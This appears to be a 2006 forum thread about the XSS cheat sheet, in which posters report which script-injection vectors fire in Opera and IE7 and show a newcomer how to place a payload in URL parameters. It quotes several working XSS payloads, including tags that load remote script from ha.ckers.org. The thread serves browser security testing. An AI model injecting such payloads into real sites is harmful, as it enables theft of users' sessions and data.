i'm testing them for use in browser detecting and came across one that was untested for opera. -i'll include more if i find them

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> that vector works for opera8.54 (and 9) .. interestingly though, i think ie7 may not allow external alerts, although it didn't still insert the remote text.

if you'd like to extend the cheat sheet's legend for ie7 and opera9 .. i'll be testing about half of them and recording the results.

-maluc

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> works in all browsers tested .. although it seriously fucks up the html for the rest of the page, in all browsers

until it reaches a </script> anyway

Edit: the same goes for the vector: <SCRIPT SRC=//ha.ckers.org/.j> .. renders in all browsers but messes up the html that follows.. and works correctly in all browsers with a </script> added

-maluc



Edited 1 time(s). Last edit at 09/17/2006 09:49AM by maluc.

I'm a little hesitant to add IE7.0 until it gets out of beta, although I have done quite a bit of testing myself... It appears that the javascript: directive inside images will be the biggest change between IE7.0 and IE6.0.

But yes, point taken, I need to re-test all the modern browsers. Anyone have BeEF with all the browsers?

- RSnake
Gotta love it. http://ha.ckers.org

i dont mean to sound stupid, but what do i insert these codes into?? like bloggs? profiles? or what?

Those places, yes... but most often it's in URL parameters:

h ttp://whatever.com/function.php?variable1=stuff&variable2=stuff

You would insert it where you saw the "stuff" so it might look like:

h ttp://whatever.com/function.php?variable1=<script>alert("XSS")</script>&variable2=stuff

There are lots of other places, but that should give you an idea.

- RSnake
Gotta love it. http://ha.ckers.org